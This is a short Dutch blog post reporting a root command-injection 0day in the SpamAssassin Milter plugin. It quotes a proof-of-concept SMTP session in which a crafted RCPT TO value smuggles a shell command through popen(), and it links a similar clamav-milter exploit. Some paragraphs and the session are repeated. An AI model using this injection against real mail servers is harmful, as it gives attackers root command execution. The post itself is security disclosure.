0day in Spamassassin Milter
07-03-2010,23:44 door
Op 2010-03-07 19:17:14 GMT heeft Kingcope een nogal scary uitziende 0day gepost voor de Spamassassin Milter Plugin, zie http://lists.grok.org.uk/pipermail/full-disclosure/2010-March/073489.html:
Onderaan zijn post is duidelijk te zien dat een aanvaller elk gewenst commando als root kan uitvoeren:
Dit type attack lijkt overigens niet nieuw, in http://www.milw0rm.com/exploits/4761 (medio 2007) is ongeveer hetzelfde te zien voor clamav-milter (zie ook http://securitytracker.com/alerts/2007/Aug/1018610.html). Ook daar werd op een onveilige manier gebruik gemaakt van popen().
If spamass-milter is run with the expand flag (-x option) it runs a popen() including the attacker supplied recipient (RCPT TO).
Onderaan zijn post is duidelijk te zien dat een aanvaller elk gewenst commando als root kan uitvoeren:
$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me at me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok
$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
De laatste SpamAssassin Milter sources dateren van 20060405 (zie http://savannah.nongnu.org/projects/spamass-milt/).
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me at me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok
$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
Dit type attack lijkt overigens niet nieuw, in http://www.milw0rm.com/exploits/4761 (medio 2007) is ongeveer hetzelfde te zien voor clamav-milter (zie ook http://securitytracker.com/alerts/2007/Aug/1018610.html). Ook daar werd op een onveilige manier gebruik gemaakt van popen().
Laatst gewijzigd:
07-03-2010,
23:47
